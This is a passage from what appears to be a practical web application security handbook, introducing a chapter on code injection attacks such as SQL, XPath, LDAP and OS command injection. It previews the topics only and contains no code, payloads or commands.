Chapter 8  ■ Attacking Access Controls  235

The topic of code injection is a huge one, encompassing dozens of different

languages and environments, and a wide variety of different attacks. It would

be possible to write an entire book on any one of these areas, exploring all of

the theoretical subtleties of how vulnerabilities can arise and be exploited.

Because this is a practical handbook, we will focus fairly ruthlessly on the

knowledge and techniques that you will need in order to exploit the code

injection flaws that exist in real-world applications.

SQL injection is the elder statesman of code injection attacks, being still one

of the more prevalent vulnerabilities in the wild, and frequently one of the

most devastating. It is also a highly fertile area of current research, and we will

explore in detail all of the latest attack techniques, including filter bypasses,

inference-based attacks, and fully blind exploitation.

We will also examine a host of other common code injection vulnerabilities,

including injection into web scripting languages, SOAP, XPath, email, LDAP,

and the server operating system. In each case, we will describe the practical

steps that you can take to identify and exploit these defects. There is a concep-

tual synergy in the process of understanding each new type of injection. Hav-

ing grasped the essentials of exploiting these half-dozen manifestations of the

flaw, you should be confident that you can draw on this understanding when

you encounter a new category of injection, and indeed devise additional

means of attacking those that others have already studied.